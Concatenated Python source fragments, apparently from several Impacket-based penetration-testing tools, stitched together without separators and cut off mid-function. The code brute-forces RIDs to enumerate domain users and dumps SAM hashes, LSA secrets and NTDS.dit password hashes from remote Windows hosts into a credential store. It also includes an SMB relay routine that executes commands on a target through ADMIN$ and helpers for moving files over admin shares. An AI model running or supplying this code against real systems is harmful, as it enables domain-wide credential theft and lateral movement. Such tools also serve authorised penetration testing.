spider.spider(self.args.spider, self.args.spider_folder, self.args.pattern, self.args.regex, self.args.exclude_dirs, self.args.depth, self.args.content, self.args.only_files) else: spider.spider(share, folder, pattern, regex, exclude_dirs, depth, content, onlyfiles) self.logger.info("Done spidering (Completed in {})".format(time() - start_time)) return spider.results def rid_brute(self, maxRid=None): entries = [] if not maxRid: maxRid = int(self.args.rid_brute) KNOWN_PROTOCOLS = { 135: {'bindstr': r'ncacn_ip_tcp:%s', 'set_host': False}, 139: {'bindstr': r'ncacn_np:{}[\pipe\lsarpc]', 'set_host': True}, 445: {'bindstr': r'ncacn_np:{}[\pipe\lsarpc]', 'set_host': True}, } try: stringbinding = KNOWN_PROTOCOLS[self.args.port]['bindstr'].format(self.host) logging.debug('StringBinding {}'.format(stringbinding)) rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(self.args.port) if KNOWN_PROTOCOLS[self.args.port]['set_host']: rpctransport.setRemoteHost(self.host) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash) dce = rpctransport.get_dce_rpc() dce.connect() except Exception as e: self.logger.error('Error creating DCERPC connection: {}'.format(e)) return entries # Want encryption? Uncomment next line # But make SIMULTANEOUS variable <= 100 #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY) # Want fragmentation? Uncomment next line #dce.set_max_fragment_size(32) self.logger.success('Brute forcing RIDs') dce.bind(lsat.MSRPC_UUID_LSAT) resp = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES) policyHandle = resp['PolicyHandle'] resp = lsad.hLsarQueryInformationPolicy2(dce, policyHandle, lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation) domainSid = resp['PolicyInformation']['PolicyAccountDomainInfo']['DomainSid'].formatCanonical() soFar = 0 SIMULTANEOUS = 1000 for j in range(maxRid//SIMULTANEOUS+1): if (maxRid - soFar) // SIMULTANEOUS == 0: sidsToCheck = (maxRid - soFar) % SIMULTANEOUS else: sidsToCheck = SIMULTANEOUS if sidsToCheck == 0: break sids = list() for i in range(soFar, soFar+sidsToCheck): sids.append(domainSid + '-%d' % i) try: lsat.hLsarLookupSids(dce, policyHandle, sids,lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta) except DCERPCException as e: if str(e).find('STATUS_NONE_MAPPED') >= 0: soFar += SIMULTANEOUS continue elif str(e).find('STATUS_SOME_NOT_MAPPED') >= 0: resp = e.get_packet() else: raise for n, item in enumerate(resp['TranslatedNames']['Names']): if item['Use'] != SID_NAME_USE.SidTypeUnknown: rid = soFar + n domain = resp['ReferencedDomains']['Domains'][item['DomainIndex']]['Name'] user = item['Name'] sid_type = SID_NAME_USE.enumItems(item['Use']).name self.logger.highlight("{}: {}\\{} ({})".format(rid, domain, user, sid_type)) entries.append({'rid': rid, 'domain': domain, 'username': user, 'sidtype': sid_type}) soFar += SIMULTANEOUS dce.disconnect() return entries @requires_admin def put_file(self): self.logger.info('Copy {} to {}'.format(self.args.put_file[0], self.args.put_file[1])) with open(self.args.put_file[0], 'rb') as file: try: self.conn.putFile(self.args.share, self.args.put_file[1], file.read) self.logger.success('Created file {} on \\\\{}{}'.format(self.args.put_file[0], self.args.share, self.args.put_file[1])) except Exception as e: self.logger.error('Error writing file to share {}: {}'.format(self.args.share, e)) @requires_admin def get_file(self): self.logger.info('Copy {} to {}'.format(self.args.get_file[0], self.args.get_file[1])) with open(self.args.get_file[1], 'wb+') as file: try: self.conn.getFile(self.args.share, self.args.get_file[0], file.write) self.logger.success('File {} was transferred to {}'.format(self.args.get_file[0], self.args.get_file[1])) except Exception as e: self.logger.error('Error reading file {}: {}'.format(self.args.share, e)) def enable_remoteops(self): if self.remote_ops is not None and self.bootkey is not None: return try: self.remote_ops = RemoteOperations(self.conn, False, None) #self.__doKerberos, self.__kdcHost self.remote_ops.enableRegistry() self.bootkey = self.remote_ops.getBootKey() except Exception as e: self.logger.error('RemoteOperations failed: {}'.format(e)) @requires_admin def sam(self): self.enable_remoteops() host_id = self.db.get_computers(filterTerm=self.host)[0][0] def add_sam_hash(sam_hash, host_id): add_sam_hash.sam_hashes += 1 self.logger.highlight(sam_hash) username,_,lmhash,nthash,_,_,_ = sam_hash.split(':') self.db.add_credential('hash', self.hostname, username, ':'.join((lmhash, nthash)), pillaged_from=host_id) add_sam_hash.sam_hashes = 0 if self.remote_ops and self.bootkey: #try: SAMFileName = self.remote_ops.saveSAM() SAM = SAMHashes(SAMFileName, self.bootkey, isRemote=True, perSecretCallback=lambda secret: add_sam_hash(secret, host_id)) self.logger.success('Dumping SAM hashes') SAM.dump() SAM.export(self.output_filename) self.logger.success('Added {} SAM hashes to the database'.format(highlight(add_sam_hash.sam_hashes))) #except Exception as e: #self.logger.error('SAM hashes extraction failed: {}'.format(e)) try: self.remote_ops.finish() except Exception as e: logging.debug("Error calling remote_ops.finish(): {}".format(e)) SAM.finish() @requires_admin def lsa(self): self.enable_remoteops() def add_lsa_secret(secret): add_lsa_secret.secrets += 1 self.logger.highlight(secret) add_lsa_secret.secrets = 0 if self.remote_ops and self.bootkey: SECURITYFileName = self.remote_ops.saveSECURITY() LSA = LSASecrets(SECURITYFileName, self.bootkey, self.remote_ops, isRemote=True, perSecretCallback=lambda secretType, secret: add_lsa_secret(secret)) self.logger.success('Dumping LSA secrets') LSA.dumpCachedHashes() LSA.exportCached(self.output_filename) LSA.dumpSecrets() LSA.exportSecrets(self.output_filename) self.logger.success('Dumped {} LSA secrets to {} and {}'.format(highlight(add_lsa_secret.secrets), self.output_filename + '.secrets', self.output_filename + '.cached')) try: self.remote_ops.finish() except Exception as e: logging.debug("Error calling remote_ops.finish(): {}".format(e)) LSA.finish() @requires_admin def ntds(self): self.enable_remoteops() use_vss_method = False NTDSFileName = None host_id = self.db.get_computers(filterTerm=self.host)[0][0] def add_ntds_hash(ntds_hash, host_id): add_ntds_hash.ntds_hashes += 1 self.logger.highlight(ntds_hash) if ntds_hash.find('$') == -1: if ntds_hash.find('\\') != -1: domain, hash = ntds_hash.split('\\') else: domain = self.domain hash = ntds_hash try: username,_,lmhash,nthash,_,_,_ = hash.split(':') parsed_hash = ':'.join((lmhash, nthash)) if validate_ntlm(parsed_hash): self.db.add_credential('hash', domain, username, parsed_hash, pillaged_from=host_id) add_ntds_hash.added_to_db += 1 return raise except: logging.debug("Dumped hash is not NTLM, not adding to db for now ;)") else: logging.debug("Dumped hash is a computer account, not adding to db") add_ntds_hash.ntds_hashes = 0 add_ntds_hash.added_to_db = 0 if self.remote_ops and self.bootkey: try: if self.args.ntds == 'vss': NTDSFileName = self.remote_ops.saveNTDS() use_vss_method = True NTDS = NTDSHashes(NTDSFileName, self.bootkey, isRemote=True, history=False, noLMHash=True, remoteOps=self.remote_ops, useVSSMethod=use_vss_method, justNTLM=False, pwdLastSet=False, resumeSession=None, outputFileName=self.output_filename, justUser=None, printUserStatus=False, perSecretCallback = lambda secretType, secret : add_ntds_hash(secret, host_id)) self.logger.success('Dumping the NTDS, this could take a while so go grab a redbull...') NTDS.dump() self.logger.success('Dumped {} NTDS hashes to {} of which {} were added to the database'.format(highlight(add_ntds_hash.ntds_hashes), self.output_filename + '.ntds', highlight(add_ntds_hash.added_to_db))) except Exception as e: #if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0: # We don't store the resume file if this error happened, since this error is related to lack # of enough privileges to access DRSUAPI. # resumeFile = NTDS.getResumeSessionFile() # if resumeFile is not None: # os.unlink(resumeFile) self.logger.error(e) try: self.remote_ops.finish() except Exception as e: logging.debug("Error calling remote_ops.finish(): {}".format(e)) NTDS.finish()
def run(self): # Here PUT YOUR CODE! if self.tcpshell is not None: LOG.info('Started interactive SMB client shell via TCP on 127.0.0.1:%d' % self.tcpshell.port) #Start listening and launch interactive shell self.tcpshell.listen() self.shell = MiniImpacketShell(self.__SMBConnection, self.tcpshell) self.shell.cmdloop() return if self.config.exeFile is not None: result = self.installService.install() if result is True: LOG.info("Service Installed.. CONNECT!") self.installService.uninstall() else: from impacket.examples.secretsdump import RemoteOperations, SAMHashes from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins samHashes = None try: # We have to add some flags just in case the original client did not # Why? needed for avoiding INVALID_PARAMETER if self.__SMBConnection.getDialect() == smb.SMB_DIALECT: flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags() flags2 |= smb.SMB.FLAGS2_LONG_NAMES self.__SMBConnection.getSMBServer().set_flags(flags2=flags2) remoteOps = RemoteOperations(self.__SMBConnection, False) remoteOps.enableRegistry() except Exception as e: if "rpc_s_access_denied" in str(e): # user doesn't have correct privileges if self.config.enumLocalAdmins: LOG.info("Relayed user doesn't have admin on {}. Attempting to enumerate users who do...".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding))) enumLocalAdmins = EnumLocalAdmins(self.__SMBConnection) try: localAdminSids, localAdminNames = enumLocalAdmins.getLocalAdmins() LOG.info("Host {} has the following local admins (hint: try relaying one of them here...)".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding))) for name in localAdminNames: LOG.info("Host {} local admin member: {} ".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding), name)) except DCERPCException: LOG.info("SAMR access denied") return # Something else went wrong. aborting LOG.error(str(e)) return try: if self.config.command is not None: remoteOps._RemoteOperations__executeRemote(self.config.command) LOG.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost()) self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer) self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output') print(self.__answerTMP.decode(self.config.encoding, 'replace')) else: bootKey = remoteOps.getBootKey() remoteOps._RemoteOperations__serviceDeleted = True samFileName = remoteOps.saveSAM() samHashes = SAMHashes(samFileName, bootKey, isRemote = True) samHashes.dump() samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes') LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost()) except Exception as e: LOG.error(str(e)) finally: if samHashes is not None: samHashes.finish() if remoteOps is not None: remoteOps.finish()
class DumpSecrets: def __init__(self, remote_name, username="", password="", domain="", options=None): self.__use_VSS_method = options.use_vss self.__remote_name = remote_name self.__remote_host = options.target_ip self.__username = username self.__password = password self.__domain = domain self.__lmhash = "" self.__nthash = "" self.__smb_connection = None self.__remote_ops = None self.__SAM_hashes = None self.__NTDS_hashes = None self.__LSA_secrets = None self.__system_hive = options.system self.__bootkey = options.bootkey self.__security_hive = options.security self.__sam_hive = options.sam self.__ntds_file = options.ntds self.__no_lmhash = options.no_lmhash self.__is_remote = options.is_remote self.__do_kerberos = options.k self.__just_DC = options.just_dc self.__just_DC_NTLM = options.just_dc_ntlm self.__can_process_SAM_LSA = options.can_process_SAM_LSA self.__kdc_host = options.dc_ip self.__options = options if options.hashes is not None: self.__lmhash, self.__nthash = options.hashes.split(":") def connect(self): self.__smb_connection = SMBConnection(self.__remote_name, self.__remote_host) self.__smb_connection.login( self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, ) def dump(self): # noqa: C901 with StdoutCapture() as output_captor: dumped_secrets = "" try: if self.__remote_name.upper( ) == "LOCAL" and self.__username == "": self.__is_remote = False self.__use_VSS_method = True if self.__system_hive: local_operations = LocalOperations(self.__system_hive) bootkey = local_operations.getBootKey() if self.__ntds_file is not None: # Let's grab target's configuration about LM Hashes storage. self.__no_lmhash = local_operations.checkNoLMHashPolicy( ) else: import binascii bootkey = binascii.unhexlify(self.__bootkey) else: self.__is_remote = True bootkey = None try: try: self.connect() except Exception as e: if os.getenv( "KRB5CCNAME" ) is not None and self.__do_kerberos is True: # SMBConnection failed. That might be because there was no way to # log into the # target system. We just have a last resort. Hope we have tickets # cached and that they # will work logger.debug( "SMBConnection didn't work, hoping Kerberos will help (%s)" % str(e)) else: raise self.__remote_ops = RemoteOperations( self.__smb_connection, self.__do_kerberos, self.__kdc_host) self.__remote_ops.setExecMethod( self.__options.exec_method) if (self.__just_DC is False and self.__just_DC_NTLM is False or self.__use_VSS_method is True): self.__remote_ops.enableRegistry() bootkey = self.__remote_ops.getBootKey() # Let's check whether target system stores LM Hashes. self.__no_lmhash = self.__remote_ops.checkNoLMHashPolicy( ) except Exception as e: self.__can_process_SAM_LSA = False if (str(e).find("STATUS_USER_SESSION_DELETED") and os.getenv("KRB5CCNAME") is not None and self.__do_kerberos is True): # Giving some hints here when SPN target name validation is set to # something different to Off. # This will prevent establishing SMB connections using TGS for SPNs # different to cifs/. logger.error( "Policy SPN target name validation might be restricting full " "DRSUAPI dump." + "Try -just-dc-user") else: logger.error("RemoteOperations failed: %s" % str(e)) # If RemoteOperations succeeded, then we can extract SAM and LSA. if (self.__just_DC is False and self.__just_DC_NTLM is False and self.__can_process_SAM_LSA): try: if self.__is_remote is True: SAM_file_name = self.__remote_ops.saveSAM() else: SAM_file_name = self.__sam_hive self.__SAM_hashes = SAMHashes( SAM_file_name, bootkey, isRemote=self.__is_remote) self.__SAM_hashes.dump() except Exception as e: logger.error("SAM hashes extraction failed: %s" % str(e)) try: if self.__is_remote is True: SECURITY_file_name = self.__remote_ops.saveSECURITY( ) else: SECURITY_file_name = self.__security_hive self.__LSA_secrets = LSASecrets( SECURITY_file_name, bootkey, self.__remote_ops, isRemote=self.__is_remote, ) self.__LSA_secrets.dumpCachedHashes() self.__LSA_secrets.dumpSecrets() except Exception as e: logger.debug(traceback.print_exc()) logger.error("LSA hashes extraction failed: %s" % str(e)) # NTDS Extraction we can try regardless of RemoteOperations failing. It might # still work. if self.__is_remote is True: if self.__use_VSS_method and self.__remote_ops is not None: NTDS_file_name = self.__remote_ops.saveNTDS() else: NTDS_file_name = None else: NTDS_file_name = self.__ntds_file self.__NTDS_hashes = NTDSHashes( NTDS_file_name, bootkey, isRemote=self.__is_remote, noLMHash=self.__no_lmhash, remoteOps=self.__remote_ops, useVSSMethod=self.__use_VSS_method, justNTLM=self.__just_DC_NTLM, ) try: self.__NTDS_hashes.dump() except Exception as e: logger.debug(traceback.print_exc()) if str(e).find("ERROR_DS_DRA_BAD_DN") >= 0: # We don't store the resume file if this error happened, since this error # is related to lack # of enough privileges to access DRSUAPI. resume_file = self.__NTDS_hashes.getResumeSessionFile() if resume_file is not None: os.unlink(resume_file) logger.error(e) if self.__use_VSS_method is False: logger.error( "Something wen't wrong with the DRSUAPI approach. Try again with " "-use-vss parameter") self.cleanup() except (Exception, KeyboardInterrupt) as e: logger.debug(traceback.print_exc()) logger.error(e) if self.__NTDS_hashes is not None: if isinstance(e, KeyboardInterrupt): resume_file = self.__NTDS_hashes.getResumeSessionFile() if resume_file is not None: os.unlink(resume_file) try: self.cleanup() except Exception: pass finally: dumped_secrets = (output_captor.get_captured_stdout_output() ) # includes hashes and kerberos keys return dumped_secrets def cleanup(self): logger.debug("Cleaning up...") if self.__remote_ops: self.__remote_ops.finish() if self.__SAM_hashes: self.__SAM_hashes.finish() if self.__LSA_secrets: self.__LSA_secrets.finish() if self.__NTDS_hashes: self.__NTDS_hashes.finish()
class SmbCon(Connector): def __init__(self, args, loggers, host, db): Connector.__init__(self, args, loggers, host) self.auth = False self.con = False self.client = ''.join( [choice(ascii_letters + digits) for x in range(7)]) self.smbv1 = False self.os = '' self.admin = False self.signing = False self.os_arch = '0' self.remote_ops = None self.bootkey = None self.db = db self.port = 445 ######################### # Session Management ######################### def create_smb_con(self): # Create SMB Con if self.smb_connection(): self.host_info() try: # SMB Auth self.con.login(self.username, self.password, self.domain, lmhash=self.lmhash, nthash=self.nthash) self.auth = True self.host_info() self.isAdmin() self.update_db() except Exception as e: raise Exception(str(e)) else: raise Exception('Connection to Server Failed') def update_db(self): self.db.update_host(self.host, self.ip, self.domain, self.os, self.signing) if self.username and self.password or self.username and self.hash: self.db.update_user(self.username, self.password, self.domain, self.hash) if self.admin: self.db.update_admin(self.username, self.domain, self.host) def logoff(self): self.con.logoff() def close(self): try: self.con.logoff() except: pass try: self.con.close() except: pass ######################### # SMB Connection ######################### def smb_connection(self): if self.smbv1_con(): return True elif self.smbv3_con(): return True return False def smbv1_con(self): try: self.con = SMBConnection(self.client, self.host, sess_port=self.port, preferredDialect=SMB_DIALECT, timeout=int(self.timeout)) self.smbv1 = True self.con.setTimeout(self.timeout) return True except Exception as e: return False def smbv3_con(self): try: self.con = SMBConnection(self.client, self.host, sess_port=self.port, timeout=int(self.timeout)) self.con.setTimeout(self.timeout) return True except Exception as e: return False ######################### # Authentication (NOT IN USE) ######################### def set_host(self, local_auth): # Get domain for authentication purposes if local_auth: self.domain = self.con.getServerName( ) + "." + self.con.getServerDNSDomainName() else: self.domain = self.con.getServerDNSDomainName() # Backup for Linux/Unix systems if not self.domain: self.domain = self.con.getServerName( ) + "." + self.con.getServerDNSDomainName() ################################ # Enumerate Host information ################################ def host_info(self): try: self.srvdomain = self.get_domain() self.host = self.get_hostname() self.os = self.con.getServerOS() self.signing = self.con.isSigningRequired() arch = self.get_os_arch() if arch == 32 or arch == 64: self.os_arch = " x{}".format(str(arch)) else: self.os_arch = '' except Exception as e: self.logger.debug("SMB Host Info: {}".format(str(e))) def get_os_arch(self): # Credit: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py # Credit: https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_19/examples/getArch.py try: stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host) transport = DCERPCTransportFactory(stringBinding) transport.set_connect_timeout(5) dce = transport.get_dce_rpc() dce.connect() try: dce.bind( MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')) except DCERPCException as e: if str(e).find('syntaxes_not_supported') >= 0: dce.disconnect() return 32 else: dce.disconnect() return 64 except: return 0 def get_hostname(self): if self.con.getServerDNSDomainName() and not self.local_auth: if self.con.getServerName().lower( ) != self.con.getServerDNSDomainName().lower(): return (self.con.getServerName() + "." + self.con.getServerDNSDomainName()) else: return self.con.getServerName() else: return self.con.getServerName() def get_domain(self): try: return self.con.getServerDomain() except: return self.getServerName() def list_shares(self): # name=share['shi1_netname'][:-1], description=share['shi1_remark'] return self.con.listShares() ################################ # Host/Domain Password Policy ################################ def password_policy(self): SAMRDump(self).dump(self.host) ################################ # List Shares & Check Share Permissions ################################ def read_perm(self, share): try: # Silently list path to check access self.list_path(share, False) return True except: return False def write_perm(self, share): try: # Create dir to check write access tmp = '.' + ''.join( [choice(ascii_letters + digits) for x in range(5)]) self.con.createDirectory(share, tmp) self.con.deleteDirectory(share, tmp) return True except Exception as e: return False def list_path(self, share, path): if not path: path = '/*' return self.con.listPath(share, path) ################################ # Check if User Admin ################################ def isAdmin(self): rpctransport = SMBTransport(self.host, self.port, r'\svcctl', smb_connection=self.con) dce = rpctransport.get_dce_rpc() try: dce.connect() except: pass else: dce.bind(scmr.MSRPC_UUID_SCMR) try: # 0xF003F - SC_MANAGER_ALL_ACCESS # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx ans = scmr.hROpenSCManagerW(dce, '{}\x00'.format(self.host), 'ServicesActive\x00', 0xF003F) self.admin = True return True except scmr.DCERPCException as e: pass return False ################################ # Dump SAM / LSA # Methods were modified from: # https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py # https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py ################################ def enable_remoteops(self): if self.remote_ops is not None and self.bootkey is not None: return try: self.remote_ops = RemoteOperations(self.con, False, None) self.remote_ops.enableRegistry() self.bootkey = self.remote_ops.getBootKey() except Exception as e: self.logger.fail('RemoteOperations failed for {}: {}'.format( self.host, str(e))) def sam(self): def add_sam_hash(sam_hash, host): self.logger.success([self.host, self.ip, "SAM HASH", sam_hash]) username, _, lmhash, nthash, _, _, _ = sam_hash.split(':') self.db.update_user(username, '', host, "{}:{}".format(lmhash, nthash)) add_sam_hash.added_to_db += 1 try: add_sam_hash.added_to_db = 0 self.enable_remoteops() if self.remote_ops and self.bootkey: SAMFileName = self.remote_ops.saveSAM() SAM = SAMHashes(SAMFileName, self.bootkey, isRemote=True, perSecretCallback=lambda secret: add_sam_hash( secret, self.host)) SAM.dump() except Exception as e: self.logger.debug('SAM Extraction Failed for {}: {}'.format( self.host, str(e))) if add_sam_hash.added_to_db > 0: self.logger.success([ self.host, self.ip, "SAM HASH", '{} NTLM hashes added to the database'.format( add_sam_hash.added_to_db) ]) try: self.remote_ops.finish() SAM.finish() except Exception as e: self.logger.debug( ["SAM", "Error calling remote_ops.finish(): {}".format(e)]) def ntds(self): def add_ntds_hash(ntds_hash): if ntds_hash.find('$') == -1: if "CLEARTEXT" in ntds_hash: try: add_ntds_hash.clear_text += 1 username, password = ntds_hash.split(":CLEARTEXT:") domain, username = username.split("\\") self.db.update_user(username, '', domain, password) add_ntds_hash.added_to_db += 1 except: self.logger.fail( "Error adding clear text cred to db: {}".format( ntds_hash)) else: if ntds_hash.find('\\') != -1: domain, hash = ntds_hash.split('\\') else: domain = self.domain hash = ntds_hash try: username, _, lmhash, nthash, _, _, _ = hash.split(':') parsed_hash = ':'.join((lmhash, nthash)) if validate_ntlm(parsed_hash): add_ntds_hash.ntds_hashes += 1 self.db.update_user(username, '', domain, "{}:{}".format(lmhash, nthash)) add_ntds_hash.added_to_db += 1 except: self.logger.debug( "Skipping non-NTLM hash: {}".format(ntds_hash)) else: self.logger.debug("Skipping computer account") try: self.enable_remoteops() use_vss_method = self.args.use_vss NTDSFileName = None add_ntds_hash.ntds_hashes = 0 add_ntds_hash.clear_text = 0 add_ntds_hash.added_to_db = 0 outfile = os.path.join(os.path.expanduser('~'), '.ar3', 'workspaces', self.args.workspace, self.domain) if self.remote_ops and self.bootkey: if self.args.ntds is 'vss': NTDSFileName = self.remote_ops.saveNTDS() use_vss_method = True NTDS = NTDSHashes(NTDSFileName, self.bootkey, isRemote=True, history=False, noLMHash=True, remoteOps=self.remote_ops, useVSSMethod=use_vss_method, justNTLM=False, pwdLastSet=False, resumeSession=None, outputFileName=outfile, justUser=None, printUserStatus=False, perSecretCallback=lambda secretType, secret: add_ntds_hash(secret)) self.logger.info([ self.host, self.ip, "NTDS", 'Dumping NTDS.dit, this could take a minute' ]) NTDS.dump() self.logger.success([ self.host, self.ip, "NTDS", '{} NTLM hashes and {} clear text passwords collected'. format(add_ntds_hash.ntds_hashes, add_ntds_hash.clear_text) ]) self.logger.success([ self.host, self.ip, "NTDS", '{} creds added to the database'.format( add_ntds_hash.added_to_db) ]) self.logger.info([ self.host, self.ip, "NTDS", 'Hash files located at: {}'.format(outfile) ]) else: raise Exception("RemoteOps and BootKey not initiated") except Exception as e: self.logger.fail('NTDS Extraction Failed for {}: {}'.format( self.host, str(e))) try: self.remote_ops.finish() NTDS.finish() except Exception as e: self.logger.debug( ["NTDS", "Error calling remote_ops.finish(): {}".format(e)]) ################################ # File Interaction ################################ def createFile(self, filename, data, share='C$'): # Create new file & write data, Not In Use f = remotefile.RemoteFile(self.con, filename, share) f.create() f.write(data) f.close() def uploadFile(self, local_file, location, share='C$'): f = open(local_file) self.con.putFile(share, location, f.read) f.close() def downloadFile(self, remote_file, location='ar3_download', share='C$'): f = open(location, 'wb') self.con.getFile(share, remote_file, f.write) f.close() return def deleteFile(self, remote_file, share='C$'): self.con.deleteFile(share, remote_file)
class DumpSecrets: def __init__(self, remoteName, username='', password='', domain='', targetip=None, sam='', system='', security='', justdc=True): self.__remoteName = remoteName self.__remoteHost = targetip self.__username = username self.__password = password self.__domain = domain self.__lmhash = '' self.__nthash = '' self.__smbConnection = None self.__remoteOps = None self.__SAMHashes = None self.__NTDSHashes = None self.__LSASecrets = None self.__systemHive = system self.__securityHive = security self.__samHive = sam self.__ntdsFile = None self.__noLMHash = True self.__isRemote = True self.__outputFileName = 'dump' self.__justDC = justdc self.__canProcessSAMLSA = True self.__useVSSMethod = False def connect(self): self.__smbConnection = SMBConnection(self.__remoteName, self.__remoteHost) self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) def dump(self): try: if self.__remoteName.upper() == 'LOCAL' and self.__username == '': self.__isRemote = False self.__useVSSMethod = True if self.__systemHive: localOperations = LocalOperations(self.__systemHive) bootKey = localOperations.getBootKey() else: self.__isRemote = True bootKey = None try: try: self.connect() except Exception as e: raise self.__remoteOps = RemoteOperations( self.__smbConnection, False) self.__remoteOps.setExecMethod(None) if self.__justDC is False or self.__useVSSMethod is True: self.__remoteOps.enableRegistry() bootKey = self.__remoteOps.getBootKey() # Let's check whether target system stores LM Hashes self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy( ) except Exception as e: self.__canProcessSAMLSA = False if str(e).find('STATUS_USER_SESSION_DELETED' ) and os.getenv('KRB5CCNAME') is not None: # Giving some hints here when SPN target name validation is set to something different to Off # This will prevent establishing SMB connections using TGS for SPNs different to cifs/ logging.error( 'Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user' ) else: logging.error('RemoteOperations failed: %s' % str(e)) # If RemoteOperations succeeded, then we can extract SAM and LSA if self.__justDC is False and self.__canProcessSAMLSA: try: if self.__isRemote is True: SAMFileName = self.__remoteOps.saveSAM() else: SAMFileName = self.__samHive self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote=self.__isRemote) self.__SAMHashes.dump() if self.__outputFileName is not None: self.__SAMHashes.export(self.__outputFileName) except Exception as e: logging.error('SAM hashes extraction failed: %s' % str(e)) try: if self.__isRemote is True: SECURITYFileName = self.__remoteOps.saveSECURITY() else: SECURITYFileName = self.__securityHive self.__LSASecrets = LSASecrets(SECURITYFileName, bootKey, self.__remoteOps, isRemote=self.__isRemote) self.__LSASecrets.dumpCachedHashes() if self.__outputFileName is not None: self.__LSASecrets.exportCached(self.__outputFileName) self.__LSASecrets.dumpSecrets() if self.__outputFileName is not None: self.__LSASecrets.exportSecrets(self.__outputFileName) except Exception as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() logging.error('LSA hashes extraction failed: %s' % str(e)) # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work if self.__isRemote is True: if self.__useVSSMethod and self.__remoteOps is not None: NTDSFileName = self.__remoteOps.saveNTDS() else: NTDSFileName = None else: NTDSFileName = self.__ntdsFile self.__NTDSHashes = NTDSHashes( NTDSFileName, bootKey, isRemote=self.__isRemote, noLMHash=self.__noLMHash, remoteOps=self.__remoteOps, useVSSMethod=self.__useVSSMethod, outputFileName=self.__outputFileName) try: self.__NTDSHashes.dump() except Exception as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0: # We don't store the resume file if this error happened, since this error is related to lack # of enough privileges to access DRSUAPI. resumeFile = self.__NTDSHashes.getResumeSessionFile() if resumeFile is not None: os.unlink(resumeFile) logging.error(e) if self.__useVSSMethod is False: logging.info( 'Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter' ) self.cleanup() except (Exception, KeyboardInterrupt) as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() logging.error(e) if self.__NTDSHashes is not None: if isinstance(e, KeyboardInterrupt): while True: answer = input("Delete resume session file? [y/N] ") if answer.upper() == '': answer = 'N' break elif answer.upper() == 'Y': answer = 'Y' break elif answer.upper() == 'N': answer = 'N' break if answer == 'Y': resumeFile = self.__NTDSHashes.getResumeSessionFile() if resumeFile is not None: os.unlink(resumeFile) try: self.cleanup() except: pass def cleanup(self): logging.info('Cleaning up... ') if self.__remoteOps: self.__remoteOps.finish() if self.__SAMHashes: self.__SAMHashes.finish() if self.__LSASecrets: self.__LSASecrets.finish() if self.__NTDSHashes: self.__NTDSHashes.finish()
class DumpSecrets: def __init__(self, remoteName, username='', password='', domain='', options=None): self.__useVSSMethod = options.use_vss self.__remoteName = remoteName self.__remoteHost = options.target_ip self.__username = username self.__password = password self.__domain = domain self.__lmhash = '' self.__nthash = '' self.__aesKey = options.aesKey self.__smbConnection = None self.__remoteOps = None self.__SAMHashes = None self.__NTDSHashes = None self.__LSASecrets = None self.__systemHive = options.system self.__bootkey = options.bootkey self.__securityHive = options.security self.__samHive = options.sam self.__ntdsFile = options.ntds self.__history = options.history self.__noLMHash = True self.__isRemote = True self.__outputFileName = options.outputfile self.__doKerberos = options.k self.__justDC = options.just_dc self.__justDCNTLM = options.just_dc_ntlm self.__justUser = options.just_dc_user self.__pwdLastSet = options.pwd_last_set self.__printUserStatus= options.user_status self.__resumeFileName = options.resumefile self.__canProcessSAMLSA = True self.__kdcHost = options.dc_ip self.__options = options if options.hashes is not None: self.__lmhash, self.__nthash = options.hashes.split(':') def connect(self): self.__smbConnection = SMBConnection(self.__remoteName, self.__remoteHost) if self.__doKerberos: self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, self.__kdcHost) else: self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) def dump(self): try: if self.__remoteName.upper() == 'LOCAL' and self.__username == '': self.__isRemote = False self.__useVSSMethod = True if self.__systemHive: localOperations = LocalOperations(self.__systemHive) bootKey = localOperations.getBootKey() if self.__ntdsFile is not None: # Let's grab target's configuration about LM Hashes storage self.__noLMHash = localOperations.checkNoLMHashPolicy() else: import binascii bootKey = binascii.unhexlify(self.__bootkey) else: self.__isRemote = True bootKey = None try: try: self.connect() except Exception as e: if os.getenv('KRB5CCNAME') is not None and self.__doKerberos is True: # SMBConnection failed. That might be because there was no way to log into the # target system. We just have a last resort. Hope we have tickets cached and that they # will work logging.debug('SMBConnection didn\'t work, hoping Kerberos will help (%s)' % str(e)) pass else: raise 